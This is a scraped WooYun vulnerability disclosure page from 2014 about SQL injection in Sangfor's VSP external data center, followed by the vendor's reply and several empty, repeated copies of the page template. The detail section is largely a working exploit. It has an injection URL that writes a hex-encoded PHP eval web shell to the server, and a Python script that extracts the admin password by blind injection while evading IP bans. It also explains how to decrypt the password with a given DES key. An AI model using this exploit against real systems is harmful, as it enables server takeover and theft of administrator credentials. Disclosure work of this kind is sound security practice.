深信服VSP外置数据中心getshell | wooyun-2014-087051| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-087051

漏洞标题：深信服VSP外置数据中心getshell

漏洞作者： f4ckbaidu

提交时间：2014-12-13 23:56

修复时间：2015-03-13 23:58

公开时间：2015-03-13 23:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-12-13：细节已通知厂商并且等待厂商处理中
2014-12-15：厂商已经确认，细节仅向厂商公开
2014-12-18：细节向第三方安全合作伙伴开放
2015-02-08：细节向核心白帽子及相关领域专家公开
2015-02-18：细节向普通白帽子公开
2015-02-28：细节向实习白帽子公开
2015-03-13：细节向公众公开

简要描述：

和SSL VPN的外置数据中心漏洞一模一样，过了半年不修复还挂在官网上？？

详细说明：

参考之前的： WooYun: 深信服SSL VPN外置数据中心敏感信息泄漏&SQL注入漏洞可导致getshell
一、getshell：

https://localhost/src/login.php?action_c=login&user_type=1&user=admin&pass=admin&nodeid=1 and 1=2 union select 0x3c3f70687020406576616c28245f504f53545b277362275d293b3f3e into outfile 'D:\\Program Files\\Sangfor\\SSL\\LogKeeper\\htdocs\\test.php'

二、注入获取管理员密码
关门，上python

# encoding:utf-8
import requests
import sys
import time
if len(sys.argv)<2 :
	print "useage: test.py target\r"
	print "example: python test.py https://192.168.222.128/"
	sys.exit(0)
target = sys.argv[1]
def exploit(url,pointer) :
	password = ""
	list = ["a","b","c","d","e","f","0","1","2","3","4","5","6","7","8","9"]
	while pointer < 17 :
		flag = False
		index = 0
		while (index < len(list)) :
			sql = "and (select mid(sys_adt_pass,%d,1) from sys_adt where id=1)=\"%s\"" % (pointer+1,list[index])
			response = requests.get(url+"src/login.php?action_c=login&user_type=1&user=admin&pass=&nodeid=1 "+sql,timeout=10,verify=False)
			if "拒绝登录" in response.content : #IP被封锁时，延迟305秒
				print "login failure exceeded 5 times,ip is banned,wait for 305 seconds to continue"
				time.sleep(305)
			elif "用户名或者密码不正确" in response.content :
				print "password[%d]=%s" % (pointer,list[index])
				password += list[index]
				break
			elif "连接数据库失败" in response.content :
				index += 1
			else :
				print "error,exit!"
				sys.exit(0)
				
		pointer += 1
	print("Admin's password is %s") % (password)
exploit(target,0)
print "done!"

运行效果：

打开这个网站去解密http://des.online-domain-tools.com/
去掉密码最后一位，key为tjf，点击decrypt就能得到明文密码

漏洞证明：

修复方案：

版权声明：转载请注明来源 f4ckbaidu@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2014-12-15 15:47

厂商回复：

感谢白帽子对深信服产品提出的建议。该漏洞已于今年6月份进行修复并发布了补丁包。
此次的VSP外置数据中心存在SQL注入漏洞是由于客户未及时更新补丁包导致的。
考虑到以下3点内容：
1. VSP外置数据中心主要用于存放VSP相关日志，对于VSP安全性影响较低；
2. VSP外置数据中心用户量较少；
3. VSP数据中心部署于内网；
我们将漏洞级别降低为低级。另一方面，我们的工程师正在积极联系客户，一旦联系上客户，会为其手动更新补丁包修复该漏洞。我们会给您寄出小礼物表示感谢~！

漏洞评价：

2014-12-18 17:19 | Master ( 路人 | Rank:29 漏洞数:10 )

...

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-087051

漏洞标题：深信服VSP外置数据中心getshell

相关厂商：深信服

漏洞作者： f4ckbaidu

提交时间：2014-12-13 23:56

修复时间：2015-03-13 23:58

公开时间：2015-03-13 23:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 f4ckbaidu@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-087051

漏洞标题：深信服VSP外置数据中心getshell

相关厂商：深信服

漏洞作者： f4ckbaidu

提交时间：2014-12-13 23:56

修复时间：2015-03-13 23:58

公开时间：2015-03-13 23:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-087051"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 f4ckbaidu@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：